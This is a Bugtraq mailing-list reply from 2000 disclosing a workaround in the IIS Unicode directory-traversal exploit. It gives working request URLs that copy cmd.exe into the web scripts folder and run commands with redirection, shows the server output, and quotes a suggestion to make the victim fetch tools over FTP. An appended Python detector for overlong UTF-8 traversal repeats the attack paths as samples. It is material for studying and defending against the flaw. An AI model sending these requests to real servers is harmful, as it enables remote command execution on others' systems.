[17352] in bugtraq
Re: IIS Unicode
daemon@ATHENA.MIT.EDU (Nsfocus Security Team)
Wed Oct 25 15:38:33 2000
Message-ID: <200010250817.QAA14475@intra.nsfocus.com>
Date: Wed, 25 Oct 2000 16:12:13 +0800
Reply-To: Nsfocus Security Team <security@NSFOCUS.COM>
From: Nsfocus Security Team <security@NSFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
If we copy and rename "cmd.exe" to another filename, the limit can be bypassed.
(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\inetpub\scripts\cmd1.exe"
http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
IIS returned:
"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:
1 file(s) copied."
(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa "
http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
IIS returned:
" Directory of c:\inetpub\scripts
10/25/2000 03:48p <DIR> .
10/25/2000 03:48p <DIR> ..
10/25/2000 03:51p 6 aaa
12/07/1999 05:00a 236,304 cmd1.exe
..
abc
"
---Original Message---
>Bugtraq ID 1806,
>http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:
>
>I was having problems executing a command that contains a redirect (>) using
>any of the IIS Unicode exploits (including my own exploits on security focus
>;) ). If anyone can get a redirect working, please let me know. In order to get
>some interesting tools on the victim, you would probably want to have the
>victim to FTP to the attacker. Problem without redirect is that you cannot
>build the FTP command file, and you are a bit stuck.
>
[snip]
>------------------------------------------------------
>Roelof W Temmingh SensePost IT security
Regards,
Nsfocus Security Team <security@nsfocus.com>
http://www.nsfocus.com
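The requests quoted in this thread work because "%c1%9c" is an overlong two-byte UTF-8 encoding of the backslash, which the server's decoder accepted while the plain "..\" check did not see it. The following is an added defender-side example, not code from either poster: it decodes a request path the way that lenient decoder would, reports any overlong sequence, and flags paths whose ".." segments climb above the web root. The sample request paths are constructed for the example.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample request paths, modelled on the URLs quoted in the thread.
SAMPLE_PATHS = [
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+dir",
    "/scripts/..%5c../winnt/system32/cmd.exe",
    "/scripts/index.asp",
    "/images/logo.gif",
]

def decode_lenient_utf8(raw: bytes):
    """Decode like a decoder that accepts 2-byte overlong forms (C0/C1 lead bytes).
    Everything else is taken as Latin-1. Returns (text, overlong_seen)."""
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # Two bytes encoding a code point below 0x80: overlong, forbidden by RFC 3629.
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong = True
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), overlong

def classify(request_path: str):
    """Describe one request path: decoded form, overlong-UTF-8 use, root escape."""
    path = request_path.split("?", 1)[0]          # query string is not part of the path
    text, overlong = decode_lenient_utf8(unquote_to_bytes(path))
    depth, escaped = 0, False
    for seg in text.replace("\\", "/").split("/"):  # treat decoded backslash as separator
        if seg == "..":
            depth -= 1
            escaped = escaped or depth < 0          # climbed above the virtual root
        elif seg not in ("", "."):
            depth += 1
    return {"path": request_path, "decoded": text,
            "overlong_utf8": overlong, "traversal": escaped}

def flag_requests(paths):
    """Return only the entries that decode to a traversal or use an overlong sequence."""
    return [r for r in map(classify, paths) if r["traversal"] or r["overlong_utf8"]]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_PATHS):
        print(hit)
```

Running the check over IIS W3C logs needs the raw (undecoded) cs-uri-stem, since a log that records the already-decoded path loses the "%c1%9c" evidence.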